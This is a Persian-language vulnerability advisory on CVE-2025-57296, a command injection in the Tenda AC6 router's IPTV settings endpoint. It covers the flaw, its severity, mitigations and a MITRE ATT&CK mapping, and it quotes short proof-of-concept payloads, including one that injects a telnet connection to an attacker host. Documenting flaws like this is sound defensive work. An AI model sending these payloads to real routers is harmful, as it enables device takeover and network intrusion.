خانه » CVE-2025-57296

CVE-2025-57296

Tenda AC6 Router formSetIptv Command Injection Vulnerability via Unsanitized list and vlanId Parameters

توسط Vulnerbyte Alerts
25 بازدید
هشدار سایبری CVE-2025-57296

چکیده

آسیب‌پذیری در فریم ور روتر Tenda AC6 نسخه 15.03.05.19 به دلیل تزریق فرمان (Command Injection) در تابع formSetIptv و اندپوینت وب /goform/SetIPTVCfg است. این ضعف به مهاجمان امکان می‌دهد بدون احراز هویت، با ارسال درخواست‌های POST مخرب و دستکاری پارامترهای list و vlanId، دستورات دلخواه سیستم را اجرا کرده و کنترل غیرمجاز دستگاه را به دست آورند.

توضیحات

آسیب‌پذیری CVE-2025-57296 در روتر Tenda AC6، یک روتر بی‌سیم مصرفی با پشتیبانی از IPTV، فایروال و multi-WAN، ناشی از عدم اعتبارسنجی پارامترهای list و vlanId در تابع formSetIptv است و مطابق با CWE-77 طبقه‌بندی می‌شود.

این ضعف در فریم ور نسخه 15.03.05.19 (AC6V1.0) وجود دارد و اندپوینت وب /goform/SetIPTVCfg (رابط HTTP برای تنظیمات IPTV) را تحت تأثیر قرار می‌دهد.

تابع formSetIptv درخواست‌های POST را می‌گیرد و با یک تابع کمکی مقادیر list و vlanId را استخراج می‌کند؛ این مقادیر بی‌پاک‌سازی مستقیماً در دستور nvram set قرار می‌گیرند و توسط doSystemCmd اجرا می‌شوند. مهاجم می‌تواند با وارد کردن کاراکترهای خاص از محدوده نقل‌قول‌شده شِل خارج شود و فرمان‌های دلخواه سیستم را اجرا کند.

این آسیب‌پذیری از طریق شبکه (در بیشتر مواقع شبکه داخلی) با پیچیدگی پایین و بدون نیاز به احراز هویت یا تعامل کاربر قابل بهره‌برداری است. مهاجم می‌تواند با ارسال درخواست POST مخرب، دستورات سیستم را اجرا کند. پیامدهای آن شامل نقض محدود محرمانگی با دسترسی به فایل‌های حساس، یکپارچگی با تغییر تنظیمات روتر و امکان کنترل کامل دستگاه با اجرای دستورات دلخواه است.

کد اثبات مفهومی (PoC) منتشرشده به شرح زیر است:

  1. لیست کردن دایرکتوری روت (Root Directory Listing):

ارسال list=abc”; ls /” به اندپوینت /goform/SetIPTVCfg منجر به بازگشت محتویات دایرکتوری Root می شود.

  1. Reverse shell:

ارسال list=abc”; telnet 192.168.x.x 9999″ امکان برقراری اتصال به پورت مهاجم را فراهم می کند.

لازم به ذکر است که کوکی password احتمالا برای دسترسی اولیه لازم می باشد، اما آسیب پذیری به طور کلی بدون احراز هویت کامل نیز قابل بهره‌برداری است. تاکنون هیچ گونه پچ رسمی از سوی Tenda منتشر نشده است و کاربران باید منتظر به‌روزرسانی فریم ور باشند.

CVSS

Score Severity Version Vector String
6.5 MEDIUM 3.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

 لیست محصولات آسیب پذیر

Versions Product
15.03.05.19 AC6

 استفاده محصول در ایران

در این جدول، تعداد صفحات ایندکس‌شده در گوگل با دامنه .ir که Tenda AC6را ذکر کرده اند، ثبت شده است. این داده صرفاً برای برآورد تقریبی حضور محصولات در وب ایران استفاده شده و نمایانگر میزان نصب دقیق و استفاده واقعی نیست.

Approx. Usage in .ir Domain via Google

(Total Pages)

Product
318 Tenda AC6

 نتیجه گیری

این آسیب‌پذیری در روتر Tenda AC6 با اینکه شدت متوسطی دارد اما به دلیل امکان تزریق فرمان سیستم بدون احراز هویت، تهدیدی قابل توجه برای امنیت شبکه‌های خانگی ایجاد می‌کند و می‌تواند منجر به اجرای دستورات دلخواه، دسترسی به فایل‌های حساس یا کنترل کامل دستگاه شود. با توجه به عدم انتشار پچ رسمی، اجرای فوری اقدامات زیر برای کاهش ریسک ضروری است:

  • به‌روزرسانی فریم ور: سایت رسمی Tenda را به طور منظم بررسی کرده و به محض انتشار پچ امنیتی آن را نصب کنید.
  • اعتبارسنجی ورودی‌ها: در صورت امکان، از پروکسی یا فایروال برای فیلتر کردن درخواست‌های POST به /goform/SetIPTVCfg و محدود کردن کاراکترهای خاص مانند ; و # استفاده کنید.
  • محدودسازی دسترسی شبکه: دسترسی از راه دور به روتر را غیرفعال کرده و مدیریت دستگاه را تنها از طریق VPN و IPهای مجاز انجام دهید.
  • نظارت بر ترافیک: لاگ‌های روتر را برای شناسایی درخواست‌های مشکوک به SetIPTVCfg بررسی کرده و در صورت امکان از IDS/IPS برای شناسایی command injection بهره ببرید.
  • تقویت امنیت داخلی دستگاه: رمز عبور پیش‌فرض را تغییر دهید، ویژگی IPTV را در صورت عدم نیاز غیرفعال کنید و از پروتکل‌های امن برای دسترسی به روتر استفاده نمایید.
  • جایگزینی دستگاه: در صورت عدم انتشار پچ رسمی، روتر را با مدل‌های جدیدتر و امن‌تر جایگزین کنید.
  • آموزش کاربران: مدیران شبکه را در مورد ریسک command injection آگاه کنید و به‌روزرسانی منظم را الزامی سازید.

اجرای این اقدامات، ریسک بهره‌برداری از این آسیب‌پذیری را به حداقل رسانده و امنیت روتر Tenda AC6 را تا زمان انتشار پچ رسمی تقویت می‌کند. این آسیب‌پذیری بر اهمیت اعتبارسنجی ورودی‌ها در اندپوینت های وب و به‌روزرسانی منظم فریم ور در دستگاه‌های شبکه‌ای تأکید دارد.

امکان استفاده در تاکتیک های Mitre Attack

Initial Access (TA0001)
اندپوینت وب /goform/SetIPTVCfg از طریق شبکه قابل دسترسی بوده و پارامترهای list, vlanId بدون پاک‌سازی پردازش می‌شوند؛ بهره‌برداری با پیچیدگی پایین و بدون نیاز به تعامل کاربر ممکن است. بسته به پیکربندی، ممکن است وجود کوکی /session مدیریتی لازم باشد؛ در هر صورت سوء‌استفاده شبکه‌ای و دسترسی ابتدایی به دستگاه فراهم می‌گردد.

Execution (TA0002)
مقادیر ورودی مستقیماً در فراخوانی nvram set و سپس در doSystemCmd جایگذاری و اجرا می‌شوند؛ مهاجم می‌تواند از طریق تزریق کاراکترهای شکاف‌دهنده نقل‌قول (quote-breaking) فرمان‌های شل دلخواه را اجرا کند و در نتیجه اجرای کد از راه دور (RCE) در کانتکست فرآیند وب/روتر رخ می‌دهد.

Persistence (TA0003)
مهاجم می‌تواند مقادیر nvram یا اسکریپت‌هایی را که در راه‌اندازی مجدد بارگذاری می‌شوند تغییر دهد تا دسترسی یا ابزار مخرب به‌صورت پایدار باقی بماند (مثلاً قرار دادن دستوراتی که در بوت یا سرویس‌ها اجرا شوند).

Privilege Escalation (TA0004)
در صورتیکه فرایندهای سیستم یا فراخوانی‌های doSystemCmd با مجوزهای بالاتر مثلاً root اجرا شوند یا آسیب‌پذیری محلیِ دیگری وجود داشته باشد، اجرای دستور می‌تواند منجر به ارتقای امتیاز مهاجم به سطح سیستم /root گردد.

Defense Evasion (TA0005)
مهاجم توانایی حذف یا تغییر لاگ‌ها، دستکاری تنظیمات گزارش‌گیری یا تغییر مقادیر nvram مرتبط با مانیتورینگ را دارد تا شناسایی را دشوار سازد؛ همچنین می‌تواند مکانیزم‌های تشخیص محلی را دور بزند یا فرآیندهای نظارتی را متوقف کند.

Credential Access (TA0006)
اجرای دستورات روی دستگاه این امکان را فراهم می‌کند که مهاجم فایل‌های پیکربندی، فایل‌های حاوی پسورد یا توکن‌ها، و کلیدهای SSH محلی را بخواند و اعتبارنامه‌های ذخیره‌شده در روتر را استخراج نماید.

Discovery (TA0007)
مهاجم می‌تواند با اجرای دستورات محلی اطلاعات شبکه‌ای، پورت‌ها، سرویس‌های در حال اجرا و پیکربندی‌های روتر مانند مسیرها، جدول NAT، لیست‌های VLAN را شناسایی کند تا برد عملیات را برای حرکات بعدی تعیین نماید.

Lateral Movement (TA0008)
پس از استخراج اعتبارنامه‌ها یا باز کردن کانال‌های خروجی (reverse shell, telnet, SSH) ، مهاجم می‌تواند به میزبان‌های دیگر در شبکه حرکت کند و سرویس‌های داخلی یا دستگاه‌های متصل را هدف قرار دهد.

Collection (TA0009)
مهاجم قادر است داده‌های حساس دستگاه و شبکه را جمع‌آوری کند — شامل بکاپ‌ها، فایل‌های پیکربندی، لاگ‌ها و داده‌های عبوری — و آنها را برای مراحل بعدی نگهداری نماید.

Exfiltration (TA0010)
داده‌های جمع‌آوری‌شده می‌توانند از طریق کانال‌های شبکه‌ای reverse shell, TCP/UDP, HTTP(S), DNS tunneling یا از طریق تغییرات در پیکربندی شبکه به خارج منتقل شوند؛ مهاجم می‌تواند داده‌ها را رمزنگاری یا با ترافیک مشروع ترکیب کند تا کشف را دشوار سازد.

Impact (TA0040)
پیامدها شامل اجرای کد از راه دور (RCE) در دستگاه، نقض محرمانگی و افشای داده‌ها، تغییر یا حذف پیکربندی‌ها (نقض یکپارچگی)، و کاهش دسترس‌پذیری سرویس‌های شبکه است؛ در بدترین حالت مهاجم می‌تواند کنترل کامل روتر و مسیر ترافیک شبکه را به‌دست آورده و تهدیدی گسترده برای شبکه ایجاد کند.

منابع

  1. https://www.cve.org/CVERecord?id=CVE-2025-57296
  2. https://www.cvedetails.com/cve/CVE-2025-57296/
  3. https://github.com/ZZ2266/.github.io/tree/main/Tenda
  4. https://github.com/ZZ2266/.github.io/blob/main/Tenda/readme.md
  5. https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-57296
  6. https://vuldb.com/?id.325038
  7. https://cwe.mitre.org/data/definitions/77.html

همچنین ممکن است دوست داشته باشید

پیام بگذارید

send
سوالی دارید؟
می تونید از من بپرسید 👋 ×